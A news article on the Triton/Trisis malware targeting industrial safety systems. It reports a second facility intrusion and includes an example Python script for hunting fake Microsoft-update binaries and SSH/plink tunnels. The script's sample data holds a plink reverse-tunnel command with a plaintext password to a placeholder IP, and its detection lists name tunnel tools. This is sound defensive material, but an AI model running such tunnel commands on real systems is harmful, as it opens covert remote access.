Trisis Malware Detected in Second Industrial Facility, Amplifying Cyber‑Physical Security Concerns
When researchers at FireEye and Dragos first exposed the malware in December 2017 (FireEye named it Triton, Dragos named it Trisis), it was the first publicly documented malware built specifically to compromise industrial safety instrumented systems.
Although the initial reports were vague, evidence points to a nation‑state actor behind the attack, which first targeted an oil‑and‑gas facility in the Middle East. Its immediate effect was an unplanned shutdown when the safety controllers failed safe, but tampering with a safety system in this way could have set the stage for a catastrophic incident at the plant.
“I was in the Middle East about a week or so before Trisis hit,” recalled Jason Haward‑Grau, CISO of PAS Global. He described a conversation with a security director at a local oil company who assured him that the company’s air‑gapped network, data diodes and safety instrumented system (SIS) meant there was nothing to worry about.
Shortly after the attack, Haward‑Grau called his colleague to say, “I’m a little nervous now that we may not have all three protective layers in place.”
For months, details about Trisis remained sparse. On April 10, 2019, FireEye disclosed that it had responded to a second intrusion by the same actor at a separate critical‑infrastructure facility, confirming that the group remains active and that the first incident was not a one‑off. In October 2018, FireEye had linked the activity to a Russian government‑owned research institute.
“For most owners and operators, it doesn’t matter if Russia was behind it or a hacktivist group,” said Emily S. Miller, director of national security and critical infrastructure programs at Mocana. “What matters is whether they can cause harm. In critical infrastructure, that means loss of life.”
FireEye’s analysis shows that the Triton actor used a mix of custom and commodity intrusion tools. A custom tool, SecHack, was used for credential harvesting, while Cryptcat, Bitvise, OpenSSH and PLINK (all of which provide encrypted remote shells or SSH tunnels) served as backdoors that gave the attackers persistent, encrypted remote access into the environment.
A successful attack on a SIS could have severe consequences. “A bad actor can shut down a safety‑critical process by manipulating the configuration of a safety system,” explained Eddie Habibi, CEO of PAS Global. “The real danger is when the attacker infiltrates other industrial control systems in the same facility, setting the stage for a disaster by pushing processes beyond safe limits.”
In the facility where the malware first appeared, Triton could have interfered with a burner‑management system, potentially triggering a release of hydrogen sulfide gas.
Trisis also raises the specter of copycat attacks. “I think we have seen the catalyzation of similar attacks,” Miller noted. The malware provides a blueprint not only for oil‑and‑gas facilities but for any critical infrastructure, including building automation, much as the 2015 BlackEnergy intrusions that cut power to parts of Ukraine’s grid did for the electricity sector.
John Sheehy, vice president of strategic services at IOActive, emphasized that with today’s operational technology, an unmitigated cybersecurity flaw is essentially an unmitigated safety flaw. Schneider Electric, whose Triconex safety controllers were the target of the malware, has since launched an educational campaign, turning Triton into a call to action for the industry.
FireEye researchers believe nation‑states may be using malware like Trisis to build long‑term footholds rather than to launch immediate destructive attacks. In the first incident they estimate the adversary spent nearly a year expanding access from the corporate network to an SIS engineering workstation while hiding its tracks, for example by renaming malicious binaries to resemble Microsoft update files. FireEye has also traced the group’s activity back to at least 2014.
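As an added example (not code from FireEye, Dragos or the article), the following Python sketches two checks a defender could run over endpoint telemetry for the tradecraft described above: executables named like Microsoft update packages that are unsigned or sit outside the directories Windows uses to stage updates, and PLINK/OpenSSH invocations whose options build tunnels rather than an interactive session. The file and process records, the update‑file naming pattern and the allow‑listed directories are constructed assumptions for illustration, not indicators taken from the Triton investigation.

```python
"""Hunting for two TRITON-actor habits over constructed endpoint telemetry:
(1) binaries named like Microsoft update packages that do not look like real
    updates, and (2) plink/ssh started with tunnelling options (the kind of
    encrypted backdoor channel the actor relied on). Example code, not FireEye's."""
import ntpath  # Windows-style paths must be split with ntpath, even on Linux
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumed naming convention for Microsoft update packages: a KB number plus an
# installer extension, e.g. "windows10.0-kb4493509-x64.msu" or "KB890830.exe".
UPDATE_NAME = re.compile(r"kb\d{6,7}.*\.(exe|msu|cab|msi)$", re.IGNORECASE)

# Assumed allow-list of directories where Windows itself stores update packages.
EXPECTED_UPDATE_DIRS = (
    r"c:\windows\softwaredistribution\download",
    r"c:\windows\servicing",
)

# plink/OpenSSH options that set up forwards or tunnels instead of a shell:
# -L local forward, -R reverse forward, -D dynamic SOCKS proxy, -N no command.
TUNNEL_FLAGS = {"-L", "-R", "-D", "-N"}
TUNNEL_TOOLS = {"plink.exe", "ssh.exe", "ssh"}


@dataclass
class FileEvent:
    path: str              # full path of an executable observed on disk
    signer: Optional[str]  # Authenticode signer, or None when unsigned


@dataclass
class ProcessEvent:
    image: str    # full path of the executable that started
    cmdline: str  # its command line
    parent: str   # image name of the parent process


def masquerading_update_file(ev: FileEvent) -> bool:
    """True when a file is named like a Microsoft update but is unsigned, signed
    by someone other than Microsoft, or stored outside the update directories."""
    name = ntpath.basename(ev.path).lower()
    if not UPDATE_NAME.search(name):
        return False
    directory = ntpath.dirname(ev.path).lower()
    in_expected_dir = any(directory.startswith(d) for d in EXPECTED_UPDATE_DIRS)
    signed_by_microsoft = (ev.signer or "").lower().startswith("microsoft")
    return not (in_expected_dir and signed_by_microsoft)


def tunnel_process(ev: ProcessEvent) -> bool:
    """True when plink/ssh is launched with tunnel-building options, or with a
    password on the command line (-pw, plink only), which scripted backdoors
    need and interactive administrators rarely use."""
    tool = ntpath.basename(ev.image).lower()
    if tool not in TUNNEL_TOOLS:
        return False
    tokens = ev.cmdline.split()
    return any(t in TUNNEL_FLAGS or t == "-pw" for t in tokens)


def hunt(files: List[FileEvent], procs: List[ProcessEvent]) -> List[str]:
    """Run both checks and return one finding string per hit."""
    findings = []
    for f in files:
        if masquerading_update_file(f):
            findings.append(f"update-lookalike: {f.path} (signer={f.signer})")
    for p in procs:
        if tunnel_process(p):
            findings.append(f"tunnel: {p.cmdline} (parent={p.parent})")
    return findings


# Constructed sample telemetry: one genuine update, two lookalikes, one benign
# file, one plink reverse tunnel and one ordinary interactive ssh session.
SAMPLE_FILES = [
    FileEvent(r"C:\Windows\SoftwareDistribution\Download\windows10.0-kb4493509-x64.msu",
              "Microsoft Corporation"),
    FileEvent(r"C:\Users\Public\KB4493509.exe", None),
    FileEvent(r"C:\ProgramData\Windows-KB890830-x64.exe", "Contoso Ltd"),
    FileEvent(r"C:\Temp\notes.txt", None),
]
SAMPLE_PROCS = [
    ProcessEvent(r"C:\Program Files\PuTTY\plink.exe",
                 "plink.exe -R 8443:127.0.0.1:3389 -N -pw s3cret user@203.0.113.10",
                 "cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\OpenSSH\ssh.exe",
                 "ssh.exe admin@jumphost", "powershell.exe"),
]

if __name__ == "__main__":
    for line in hunt(SAMPLE_FILES, SAMPLE_PROCS):
        print(line)
```

On the sample data the script flags the two update lookalikes and the plink reverse tunnel and leaves the genuine update and the interactive ssh session alone. In a real deployment the allow‑list and the signer check would be backed by the host's actual catalog of installed updates, and the process check would be joined with the parent process and network destination so that an engineer's legitimate jump‑host session is not paged on.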
Sheehy urged a holistic approach: “Designers should employ orthogonal safety controls—such as mechanical pressure relief valves or governors—that have zero coincidence with the control systems and therefore cannot be affected by them. OT implementations should manage the consequences of a cyberattack through layered protections and non‑cybersecurity engineering controls, focusing on operational resilience.”
“We need to harden and embed security into these industrial control systems from the very beginning,” Miller said. “Until we do that, we’ll continue leaving ourselves sitting ducks for future critical‑infrastructure attacks.”
Trisis’s emergence underscores the urgent need for integrated cyber‑physical security strategies that protect both digital assets and the physical processes they govern.